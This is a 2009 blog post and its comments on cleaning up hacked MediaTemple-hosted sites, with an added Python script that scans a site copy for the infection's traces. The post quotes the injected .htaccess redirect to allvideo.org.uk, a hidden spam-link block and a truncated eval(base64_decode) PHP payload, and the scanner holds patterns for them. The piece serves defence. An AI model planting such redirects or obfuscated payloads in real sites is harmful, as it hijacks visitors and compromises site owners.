MediaTemple hacked, and how to fix it

November 19th, 2009

Update: MediaTemple has finally acknowledged the issue here.

Yesterday a client of mine emailed me with a peculiar problem: links to his website were redirecting visitors to allvideo.org.uk, which Firefox flags as an attack site. As it turned out, the redirect only fired for visitors arriving from search engines (see the .htaccess rules further down), which is why the site looked normal when the address was typed in directly. Checking the source of his pages also revealed a large number of spam links to various porn sites in the footer, all hidden with inline CSS in a zero-size block.

At first I thought his WordPress installation was a victim of the security hole that was exposed and exploited a few weeks ago, but some quick checks revealed that this wasn’t the issue.

After doing some research on Google, it turns out that this wasn’t a WordPress problem at all – it was a MediaTemple problem. Joomla, Drupal, WordPress and even static, flat HTML files were all being affected. According to various sources, MT is aware of the problem and is working on it, even though they haven’t contacted customers to tell them anything at all.

I find it extremely disconcerting that this is the approach they have taken even though it seems that a large number of GridServer accounts have been compromised, and it is likely that some customers aren’t even aware of it.

How I cleaned up the site

  • The redirect was being caused by entries in the .htaccess file in the root of the website’s folder. Log in over FTP (or SFTP/SSH if your account has it), open .htaccess and look for something like the following. Many FTP clients hide dotfiles by default, so turn on “show hidden files” if you cannot see it. Note the RewriteCond lines: the redirect fires only when the Referer is one of the listed search engines, so typing the address in directly shows a normal page and the site owner is often the last to notice:
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
    RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]
    

    Delete the RewriteCond lines and the RewriteRule that points at allvideo.org.uk. If your site has rewrite rules of its own (WordPress permalinks need RewriteEngine On and their own RewriteRule block), leave those in place and remove only the injected block, otherwise you trade a redirect for broken permalinks. To confirm the fix, request a page with the Referer header set to one of the listed search engines and check that you no longer receive a redirect; a plain visit proves nothing, because the rules never matched it in the first place.

  • Check the index.php file located in the root of your folder to see if it contains the following code at the bottom:

    <font style="position: absolute;overflow: hidden;height: 0;width: 0">
    <a href="http://www.bangpass.com/t1/pps=brunette/assparade.html">assparade <?php eval(base64_decode("JGw9Imh0dHA6Ly90b3Vycm[truncated]")); ?>

    Delete these lines. The hidden font/link block is the search-engine spam; the eval(base64_decode(...)) call is the actual payload and can fetch or run whatever the attacker chooses, so search the rest of the site (theme files, plugins, any other index.php) for the same eval(base64_decode( pattern rather than trusting that only this one file was touched.

  • Still in your FTP client, go to the /wordpress/wp-content/plugins/akismet folder and look for a file named akismet_log.php. Symantec identifies it as PHP.RSTBackdoor, a backdoor written in PHP that runs on any web server with PHP installed; it is not part of Akismet. Delete it, and while you are there look for other .php files you do not recognise, or with recent modification dates, in the plugins and uploads directories.
  • Once the files are clean, change your FTP, WordPress (every user account, not just your own), database and MediaTemple account passwords. Do this after removing the backdoor, not before: a backdoor still on the server lets the attacker read the new credentials out of wp-config.php or simply keep using the shell. Use SFTP or SSH instead of plain FTP if your account offers it, since FTP sends the password in clear text.

If you’re very concerned, or if other issues pop up, the safest fix is a manual reinstall of WordPress. Back up the uploads directory and your theme, note which plugins you use, then upload a fresh copy of the wordpress folder and reinstall the plugins from their original sources rather than from the old folders. Before restoring anything, check the backed-up uploads and theme for .php files you did not put there (uploads should contain nothing but media) and for the eval(base64_decode( pattern; a backdoor restored from your own backup undoes the whole exercise.
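To go through a site systematically instead of one file at a time, here is a small Python script that checks a downloaded copy of the web root for the indicators described in the steps above (the referrer-conditional redirect in .htaccess, the eval(base64_decode( payload, the zero-size hidden spam block, the akismet_log.php file and stray PHP under uploads) and strips the injected block from .htaccess while leaving the WordPress rewrite rules alone. This is an added example written for this page, not code from the original post or from MediaTemple. The sample site it builds, the example.com host name, the spam.example link and the base64 payload (which decodes to nothing more than echo 1;) are constructed placeholders; point scan_tree at your own download and pass your own domain so that redirects to your own host are not treated as injected.

```python
import os
import re
import tempfile
from pathlib import Path

# Referrer-conditional redirect: RewriteCond on HTTP_REFERER followed by a
# RewriteRule pointing at another host (visitors typing the URL never see it).
REWRITE_COND = re.compile(r"^\s*RewriteCond\b", re.I)
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
EXTERNAL_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://([^/\s]+)", re.I)
# Obfuscated payload and the zero-size hidden spam block seen in index.php.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
HIDDEN_BLOCK = re.compile(r"<font[^>]*overflow:\s*hidden;[^>]*height:\s*0;[^>]*width:\s*0", re.I)
BACKDOOR_NAMES = {"akismet_log.php"}  # dropped file named in the post

def clean_htaccess(text, own_host):
    """Drop injected referrer redirects to foreign hosts; keep everything else."""
    own_host = own_host.lower()
    kept, removed, pending = [], [], []   # pending = RewriteCond lines awaiting their rule
    for line in text.splitlines():
        if REWRITE_COND.match(line) or (pending and not line.strip()):
            pending.append(line)
            continue
        m = EXTERNAL_RULE.match(line)
        target = m.group(1).lower() if m else own_host
        injected = (target != own_host and not target.endswith("." + own_host)
                    and any(REFERER_COND.match(c) for c in pending))
        (removed if injected else kept).extend(pending + [line])
        pending = []
    kept.extend(pending)   # RewriteEngine On etc. survive, so permalinks keep working
    return "\n".join(kept) + "\n", removed

def scan_text(relpath, text, own_host):
    """Return the indicator names that match one file's path and contents."""
    rel, hits = Path(relpath), []
    name = rel.name.lower()
    if name in BACKDOOR_NAMES:
        hits.append("known-backdoor-filename")
    if name == ".htaccess" and clean_htaccess(text, own_host)[1]:
        hits.append("referrer-redirect")
    if name.endswith((".php", ".html", ".htm")):
        if EVAL_B64.search(text):
            hits.append("eval-base64")
        if HIDDEN_BLOCK.search(text):
            hits.append("hidden-spam-block")
    if name.endswith(".php") and "uploads" in rel.parts:
        hits.append("php-in-uploads")  # uploads/ should hold media only
    return hits

def scan_tree(root, own_host):
    """Walk a local copy of the web root; return sorted (relative_path, hits) pairs."""
    root, findings = Path(root), []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = Path(dirpath) / fname
            rel = path.relative_to(root).as_posix()
            hits = scan_text(rel, path.read_text(errors="replace"), own_host)
            if hits:
                findings.append((rel, hits))
    return sorted(findings)

# Constructed sample site (shapes only, not the real malware): WordPress rewrite
# rules with the injected block appended, an index.php carrying the hidden block
# and an eval(base64_decode()) whose payload is just 'echo 1;', the dropped
# akismet_log.php, a genuine plugin file and a stray PHP file in uploads.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]
"""
SAMPLE_INDEX = """\
<font style="position: absolute;overflow: hidden;height: 0;width: 0">
<a href="http://spam.example/x.html">spam</a></font>
<?php eval(base64_decode("ZWNobyAxOw==")); ?>
"""
SAMPLE_SITE = {
    ".htaccess": SAMPLE_HTACCESS,
    "index.php": SAMPLE_INDEX,
    "wp-content/plugins/akismet/akismet.php": "<?php // genuine plugin stand-in\n",
    "wp-content/plugins/akismet/akismet_log.php": "<?php // dropped backdoor stand-in\n",
    "wp-content/uploads/2009/11/thumb.php": "<?php // PHP does not belong here\n",
}

def demo():
    """Write the sample site to a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, content in SAMPLE_SITE.items():
            path = Path(tmp) / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(content)
        return scan_tree(tmp, "example.com")

if __name__ == "__main__":
    for rel, hits in demo():
        print(f"{rel}: {', '.join(hits)}")
```

The scanner only reports; it does not delete anything, because the akismet_log.php match is by name and the eval match is a pattern, and you want to look at each hit before removing it. clean_htaccess is the one piece that rewrites, and it removes just the RewriteCond/RewriteRule pair whose conditions test HTTP_REFERER and whose target is a host other than your own, so legitimate hotlink protection that redirects to your own domain is untouched.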

This post isn’t aimed at taking a low blow at MediaTemple. They offer a pretty good service, even though there are some issues such as the fact that they’re still running PHP v4. And no, having PHP v5 in a beta program that I’m not included in doesn’t help at all. I just think that they could be handling this situation much better and at the very least alerting their customers so that they can keep an eye on their sites.

Filed under Tutorial.


9 Responses to “MediaTemple hacked, and how to fix it”

  1. Matthew Hunt November 21st, 2009 at 2:25 pm

    A client of mine last week was also hacked. The exact same way. And guess who his hosting provider was? You guessed it, Media Temple. “even though they haven’t contacted customers to tell them anything at all.” You got that right. I’m lucky I don’t use Media Temple and no other clients of mine do either. “even static, flat HTML files were all being affected.” I can confirm that as well. I had to correct 10 websites. It was a long night.

  2. tony November 21st, 2009 at 2:30 pm

    Yes it’s really disappointing that it was handled this way, I really can’t figure out why they haven’t alerted their customers. I’m sure some of them are affected right now and aren’t even aware of it.

    Thanks for commenting.

  3. Lisa November 29th, 2009 at 10:39 am

    I actually got emails from MT regarding the problem but it didn’t come close to explaining what was going on and how serious. Pretty much this:
    “This is an automated notice informing you that our system has reset your Server Administrator FTP/SSH password due to suspicious activity observed on your (gs) Grid-Service. Our systems have taken measures to protect your service from any possible future exploits.”
    Another reason to move away from them since I have more trouble with MT than any other hosting firm.

  4. Tony November 29th, 2009 at 11:14 am

    I just got that email myself a few days ago and I had to go change my passwords. Really don’t know why they seem to be shooting themselves in the foot.

    Maybe sometime we’ll get the full story.

  5. Peter Hobley February 12th, 2010 at 1:48 am

    Phew, thanks for this. I had a Drupal site go down in mysterious circumstances – just got a blank white screen. Replaced my index.php file and it worked yet the links were being directed to allvideo. Found your explanation and it makes sense – I’m guessing the code in the index file screwed up the Drupal system so it totally broke. That was fortunate because it meant nobody could get redirected by the dodgy .htaccess file.

    Thanks again. Will be changing up all passwords.

  6. Drupal website hacked – hosted by Heart Internet February 12th, 2010 at 2:15 am

    [...] if you didn’t already know: Google is your friend. It was mine too as a search produced this post by Tony Geer that explained everything. Reading it I discovered that sure enough, my .htaccess file had been [...]

  7. tony February 12th, 2010 at 7:48 am

    Glad to be of help Peter!

  8. JHaslam May 14th, 2010 at 12:07 pm

    We had this happen to us as well. We couldn’t see the files you mentioned, but our .htaccess file had been hacked. Hopefully we have this fixed by changing user names and passwords for the access to our files. If not, then it is time to move elsewhere.

  9. tony May 14th, 2010 at 12:14 pm

    You may be aware, but one of the things MT did to try and mitigate the problem was to reset the database passwords for all of their users, unless they had been reset manually.
